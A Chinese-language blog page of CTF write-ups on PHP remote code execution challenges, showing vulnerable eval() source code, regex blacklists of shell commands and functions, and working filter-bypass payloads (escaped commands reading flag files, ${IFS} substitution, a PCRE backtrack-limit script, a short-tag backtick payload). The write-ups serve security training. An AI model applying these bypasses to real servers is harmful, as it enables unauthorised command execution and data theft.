<h1 id="极客大挑战-2020-rceme"><a href="#极客大挑战-2020-rceme" class="headerlink" title="[极客大挑战 2020]rceme"></a>[极客大挑战 2020]rceme</h1><h3 id="无字母数字"><a href="#无字母数字" class="headerlink" title="无字母数字"></a>无字母数字</h3><p>打开是一个网页，也是看了wp，得知看源码得到一个路径，打开得到一个文件，使用kali或者Linux打开</p>
<p>看到源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-number">0</span>);<br><span class="hljs-title function_ invoke__">session_start</span>();<br><span class="hljs-keyword">if</span>(!<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&#x27;code&#x27;</span>]))&#123;<br>        <span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&#x27;code&#x27;</span>] = <span class="hljs-title function_ invoke__">substr</span>(<span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-title function_ invoke__">mt_rand</span>().<span class="hljs-title function_ invoke__">sha1</span>(mt_rand)),<span class="hljs-number">0</span>,<span class="hljs-number">5</span>);<br>    <span class="hljs-comment">//这个值用于防止CSPF或暴力提交</span><br>&#125;<br><span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;cmd&#x27;</span>]) <span class="hljs-keyword">and</span> <span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;code&#x27;</span>]))&#123;<br> <br>        <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">substr</span>(<span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;code&#x27;</span>]),<span class="hljs-number">0</span>,<span class="hljs-number">5</span>) !== <span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&#x27;code&#x27;</span>])&#123; <span class="hljs-comment">//比较</span><br>                <span class="hljs-keyword">die</span>(<span class="hljs-string">&#x27;&lt;script&gt;alert(\&#x27;Captcha error~\&#x27;);history.back()&lt;/script&gt;&#x27;</span>);<br>        &#125;<br>        <span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&#x27;code&#x27;</span>] = <span class="hljs-title function_ invoke__">substr</span>(<span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-title function_ invoke__">mt_rand</span>().<span class="hljs-title function_ invoke__">sha1</span>(mt_rand)),<span class="hljs-number">0</span>,<span class="hljs-number">5</span>);<br>    <span class="hljs-comment">//接收cmd和code（用户填写的验证码原文）</span><br>    <span class="hljs-comment">//验证通过后立即刷新&amp;_SESSION[&#x27;code&#x27;]，防止重发</span><br>        <span class="hljs-variable">$code</span> = <span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;cmd&#x27;</span>];<br>        <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">strlen</span>(<span class="hljs-variable">$code</span>) &gt; <span class="hljs-number">70</span> <span class="hljs-keyword">or</span> <span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&#x27;/[A-Za-z0-9]|\&#x27;|&quot;|`|\ |,|\.|-|\+|=|\/|\\|&lt;|&gt;|\$|\?|\^|&amp;|\|/ixm&#x27;</span>,<span class="hljs-variable">$code</span>))&#123; <br>                <span class="hljs-keyword">die</span>(<span class="hljs-string">&#x27;&lt;script&gt;alert(\&#x27;Longlone not like you~\&#x27;);history.back()&lt;/script&gt;&#x27;</span>);<br>        &#125;<span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span>(<span class="hljs-string">&#x27;;&#x27;</span> === <span class="hljs-title function_ invoke__">preg_replace</span>(<span class="hljs-string">&#x27;/[^\s\(\)]+?\((?R)?\)/&#x27;</span>, <span class="hljs-string">&#x27;&#x27;</span>, <span class="hljs-variable">$code</span>))&#123;<br>                @<span class="hljs-keyword">eval</span>(<span class="hljs-variable">$code</span>);<br>                <span class="hljs-keyword">die</span>();<br>        &#125;	<span class="hljs-comment">//核心：白名单格式检查</span><br></code></pre></td></tr></table></figure>

<p>无字母数字的php代码执行，只允许单一函数调用（可以嵌套）</p>
<h1 id="UUCTF-2022-新生赛-ez-rce"><a href="#UUCTF-2022-新生赛-ez-rce" class="headerlink" title="[UUCTF 2022 新生赛]ez_rce"></a>[UUCTF 2022 新生赛]ez_rce</h1><h3 id="printf函数输出"><a href="#printf函数输出" class="headerlink" title="printf函数输出"></a>printf函数输出</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs php">居然都不输入参数，可恶!!!!!!!!!<br><span class="hljs-meta">&lt;?php</span><br><span class="hljs-comment">## 放弃把，小伙子，你真的不会RCE,何必在此纠结呢？？？？？？？？？？？？</span><br><span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;code&#x27;</span>]))&#123;<br>    <span class="hljs-variable">$code</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;code&#x27;</span>];<br>    <span class="hljs-keyword">if</span> (!<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&#x27;/sys|pas|read|file|ls|cat|tac|head|tail|more|less|php|base|echo|cp|\$|\*|\+|\^|scan|\.|local|current|chr|crypt|show_source|high|readgzfile|dirname|time|next|all|hex2bin|im|shell/i&#x27;</span>,<span class="hljs-variable">$code</span>))&#123;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-string">&#x27;看看你输入的参数！！！不叫样子！！&#x27;</span>;<span class="hljs-keyword">echo</span> <span class="hljs-string">&#x27;&lt;br&gt;&#x27;</span>;<br>        <span class="hljs-keyword">eval</span>(<span class="hljs-variable">$code</span>);<br>    &#125;<br>    <span class="hljs-keyword">else</span>&#123;<br>        <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;你想干什么？？？？？？？？？&quot;</span>);<br>    &#125;<br>&#125;<br><span class="hljs-keyword">else</span>&#123;<br>    <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;居然都不输入参数，可恶!!!!!!!!!&quot;</span>;<br>    <span class="hljs-title function_ invoke__">show_source</span>(<span class="hljs-keyword">__FILE__</span>);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>代码审计：没有过滤<code>\</code></p>
<p>payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">?code=printf(`l\s /`);<br></code></pre></td></tr></table></figure>

<p class='item-img' data-src='/../../AppData/Roaming/Typora/typora-user-images/image-20260613200059681.png'><img src="/../../AppData/Roaming/Typora/typora-user-images/image-20260613200059681.png" alt="image-20260613200059681"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">?code=printf(`c\at /fffffffffflagafag`);<br></code></pre></td></tr></table></figure>

<p class='item-img' data-src='/../../AppData/Roaming/Typora/typora-user-images/image-20260613200414789.png'><img src="/../../AppData/Roaming/Typora/typora-user-images/image-20260613200414789.png" alt="image-20260613200414789"></p>
<h1 id="SWPUCTF-2022-新生赛-ez-rce"><a href="#SWPUCTF-2022-新生赛-ez-rce" class="headerlink" title="[SWPUCTF 2022 新生赛]ez_rce"></a>[SWPUCTF 2022 新生赛]ez_rce</h1><p>kali扫描</p>
<p class='item-img' data-src='/../../AppData/Roaming/Typora/typora-user-images/image-20260613201500581.png'><img src="/../../AppData/Roaming/Typora/typora-user-images/image-20260613201500581.png" alt="image-20260613201500581"></p>
<p>得到<code>/robots.txt</code>这个路径。然后得到</p>
<p class='item-img' data-src='/../../AppData/Roaming/Typora/typora-user-images/image-20260613201603408.png'><img src="/../../AppData/Roaming/Typora/typora-user-images/image-20260613201603408.png" alt="image-20260613201603408"></p>
<p>然后得到源码</p>
<h1 id="MoeCTF-2021-babyRCE"><a href="#MoeCTF-2021-babyRCE" class="headerlink" title="[MoeCTF 2021]babyRCE"></a>[MoeCTF 2021]babyRCE</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><br></code></pre></td></tr></table></figure>

<p>代码审计：查看正则</p>
<p>payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">?rce=ls<br></code></pre></td></tr></table></figure>

<p class='item-img' data-src='/../../AppData/Roaming/Typora/typora-user-images/image-20260613202517453.png'><img src="/../../AppData/Roaming/Typora/typora-user-images/image-20260613202517453.png" alt="image-20260613202517453"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">?rce=t\ac$&#123;IFS&#125;fl\ag.php<br></code></pre></td></tr></table></figure>

<p class='item-img' data-src='/../../AppData/Roaming/Typora/typora-user-images/image-20260613202823660.png'><img src="/../../AppData/Roaming/Typora/typora-user-images/image-20260613202823660.png" alt="image-20260613202823660"></p>
<h1 id="NISACTF-2022-middlerce"><a href="#NISACTF-2022-middlerce" class="headerlink" title="[NISACTF 2022]middlerce"></a>[NISACTF 2022]middlerce</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs php"> <span class="hljs-meta">&lt;?php</span><br><span class="hljs-keyword">include</span> <span class="hljs-string">&quot;check.php&quot;</span>;<br><span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_REQUEST</span>[<span class="hljs-string">&#x27;letter&#x27;</span>]))&#123;<br>    <span class="hljs-variable">$txw4ever</span> = <span class="hljs-variable">$_REQUEST</span>[<span class="hljs-string">&#x27;letter&#x27;</span>];<br>    <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&#x27;/^.*([\w]|\^|\*|\(|\~|\`|\?|\/| |\||\&amp;|!|\&lt;|\&gt;|\&#123;|\x09|\x0a|\[).*$/m&#x27;</span>,<span class="hljs-variable">$txw4ever</span>))&#123;<br>        <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;再加把油喔&quot;</span>);<br>    &#125;<br>    <span class="hljs-keyword">else</span>&#123;<br>        <span class="hljs-variable">$command</span> = <span class="hljs-title function_ invoke__">json_decode</span>(<span class="hljs-variable">$txw4ever</span>,<span class="hljs-literal">true</span>)[<span class="hljs-string">&#x27;cmd&#x27;</span>];<br>        <span class="hljs-title function_ invoke__">checkdata</span>(<span class="hljs-variable">$command</span>);<br>        @<span class="hljs-keyword">eval</span>(<span class="hljs-variable">$command</span>);<br>    &#125;<br>&#125;<br><span class="hljs-keyword">else</span>&#123;<br>    <span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br>&#125;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>由语句<code>$command = json_decode($txw4ever,true)[&#39;cmd&#39;];</code>可得，<code>$txw4ever</code>一定是json格式的数据，但是，<code>preg_match()</code>函数却过滤了<code>{</code>，同时.*贪婪匹配后又匹配括号里的字符，最后再.*后结束。看似无懈可击的过滤，其实可以使用<strong>PCRE回溯次数限制</strong>绕过。</p>
<p>PHP为了防止正则表达式的拒绝服务攻击（reDOS），给pcre设定了一个回溯次数上限pcre.backtrack_limit默认1000000，超过1000000不会返回1或0而是false即超过限制即可。</p>
<p><code>$_REQUEST</code>可以接收GET和POST数据，由于GET不适合发太长的请求，这里我们选择用POST。</p>
<p>写一个python脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests<br><br>payload = <span class="hljs-string">&#x27;&#123;&quot;cmd&quot;:&quot;cmd&quot;, &quot;a&quot;:&quot;&#x27;</span>+<span class="hljs-string">&#x27;#&#x27;</span>*<span class="hljs-number">1000000</span>+<span class="hljs-string">&#x27;&quot;&#125;&#x27;</span><br>res = requests.post(<span class="hljs-string">&quot;http://node4.anna.nssctf.cn:28271/&quot;</span>,data = &#123;<span class="hljs-string">&quot;letter&quot;</span>:payload&#125;)<br><span class="hljs-built_in">print</span>(res.text)<br></code></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">C:\Users\FreesiA\miniconda3\envs\Conda\python.exe F:\python\test\.venv\111.py <br>&lt;br /&gt;<br>&lt;b&gt;Parse error&lt;/b&gt;:  syntax error, unexpected end of file in &lt;b&gt;/var/www/html/index.php(11) : eval()&#x27;d code&lt;/b&gt; on line &lt;b&gt;1&lt;/b&gt;&lt;br /&gt;<br><br><br>进程已结束，退出代码为 0<br></code></pre></td></tr></table></figure>

<p>发现没有返回<code>再加把油喔</code>，说明<code>preg_match()</code>函数被成功绕过了</p>
<p>然后就是考虑【命令】如何绕过<code>checkdata()</code>函数检测的问题了。</p>
<p><code>checkdata()</code>函数的正则过滤如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">/\^|\||\~|assert|<span class="hljs-keyword">print</span>|<span class="hljs-keyword">include</span>|<span class="hljs-keyword">require</span>|\(|<span class="hljs-keyword">echo</span>|flag|data|php|glob|sys|phpinfo|POST|GET|REQUEST|exec|pcntl|popen|proc|socket|link|passthru|file|posix|ftp|\_|disk|tcp|cat|tac/i<br></code></pre></td></tr></table></figure>

<p>这题是黑盒，也可以自己fuzz，结果不变。</p>
<p>过滤的很死，依靠函数执行命令行不通了。那么命令执行就采用<strong>短标签+反引号</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">?&gt;&lt;?= `nl /f*`?&gt;<br></code></pre></td></tr></table></figure>

<p>解释一下，<code>&lt;?=?&gt;</code>则是相当于<code>&lt;? echo&gt;，payload最前面?&gt;</code>用于闭合，payload后面一部分相当于echo+反引号执行命令。</p>
<div id="paginator"></div></div><div id="post-footer"><div id="pages" style="justify-content: flex-end"><div class="footer-link" style="width: 50%;right:1px;border-left:1px #fe2 solid"><a href="/2026/06/12/the-first-blog/">the first blog 上一篇 →</a></div></div></div></div><div class="bottom-btn"><div><a class="i-top" id="to-top" onClick="scrolls.scrolltop();" title="回到顶部" style="opacity: 0; display: none;">∧ </a><a class="i-index" id="to-index" onClick="tocControl.change()" title="文章目录"><span class="tocBtnIconBar"></span><span class="tocBtnIconBar"></span><span class="tocBtnIconBar"></span></a><a class="i-color" id="color-mode" onClick="colorMode.change()" title="切换主题"></a><a onclick="BgmControl()"><svg id="bgm-control" viewBox="0 0 30 34" fill="#18d1ff" style="width: 24px; transition: transform .3s;margin-top: 4px"><path d="M25.998 23.422V11.29h3.999v12.132h-3.999zM19.497 6.234h4.001v22.243h-4.001V6.234zM12.998.867h4v32.978h-4V.867zm-6.5 5.367h4.001v22.243H6.498V6.234zm-6.5 5.056h4v12.132h-4V11.29z"></path></svg><audio id="bgm" src="/audio/bgm.mp3" autoplay loop crossorigin="anonymous"> </audio></a></div></div></article><aside><div id="about"><a href="/" id="logo"><img src="https://ak.hypergryph.com/assets/index/images/ak/pc/faction/1.png" alt="Hexo" style="margin:0;border-radius:0;"></a><h1 id="Dr"><a href="/">John Doe</a></h1><div id="description"><p></p></div></div><div id="aside-block"><div id="toc-div"><h1>目录</h1><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#SWPUCTF-2023-%E7%A7%8B%E5%AD%A3%E6%96%B0%E7%94%9F%E8%B5%9B-RCE-PLUS"><span class="toc-number">1.</span> <span class="toc-text">[SWPUCTF 2023 秋季新生赛]RCE-PLUS</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SWPUCTF-2021-%E6%96%B0%E7%94%9F%E8%B5%9B-easyrce"><span class="toc-number">2.</span> <span class="toc-text">[SWPUCTF 2021 新生赛]easyrce</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SWPUCTF-2021-%E6%96%B0%E7%94%9F%E8%B5%9B-babyrce"><span class="toc-number">3.</span> <span class="toc-text">[SWPUCTF 2021 新生赛]babyrce</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SWPUCTF-2021-%E6%96%B0%E7%94%9F%E8%B5%9B-hardrce"><span class="toc-number">4.</span> <span class="toc-text">[SWPUCTF 2021 新生赛]hardrce</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%97%A0%E5%AD%97%E6%AF%8D%E6%95%B0%E5%AD%97%E7%BB%95%E8%BF%87"><span class="toc-number">4.1.</span> <span class="toc-text">无字母数字绕过</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#SWPUCTF-2021-%E6%96%B0%E7%94%9F%E8%B5%9B-finalrce"><span class="toc-number">5.</span> <span class="toc-text">[SWPUCTF 2021 新生赛]finalrce</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%97%A0%E5%9B%9E%E6%98%BE%E7%BB%95%E8%BF%87exec"><span class="toc-number">5.1.</span> <span class="toc-text">无回显绕过exec()</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2020-rceme"><span class="toc-number">6.</span> <span class="toc-text">[极客大挑战 2020]rceme</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%97%A0%E5%AD%97%E6%AF%8D%E6%95%B0%E5%AD%97"><span class="toc-number">6.1.</span> <span class="toc-text">无字母数字</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#UUCTF-2022-%E6%96%B0%E7%94%9F%E8%B5%9B-ez-rce"><span class="toc-number">7.</span> <span class="toc-text">[UUCTF 2022 新生赛]ez_rce</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#printf%E5%87%BD%E6%95%B0%E8%BE%93%E5%87%BA"><span class="toc-number">7.1.</span> <span class="toc-text">printf函数输出</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#SWPUCTF-2022-%E6%96%B0%E7%94%9F%E8%B5%9B-ez-rce"><span class="toc-number">8.</span> <span class="toc-text">[SWPUCTF 2022 新生赛]ez_rce</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#MoeCTF-2021-babyRCE"><span class="toc-number">9.</span> <span class="toc-text">[MoeCTF 2021]babyRCE</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#NISACTF-2022-middlerce"><span class="toc-number">10.</span> <span class="toc-text">[NISACTF 2022]middlerce</span></a></li></ol></div></div><footer><nobr>构建自 <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr><wbr><nobr> 使用主题 <a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknights</a></nobr><wbr><nobr> 主题作者 <a target="_blank" rel="noopener" href="https://github.com/Yue-plus">Yue_plus</a></nobr></footer></aside></main><canvas id="canvas-dust"></canvas></body></html>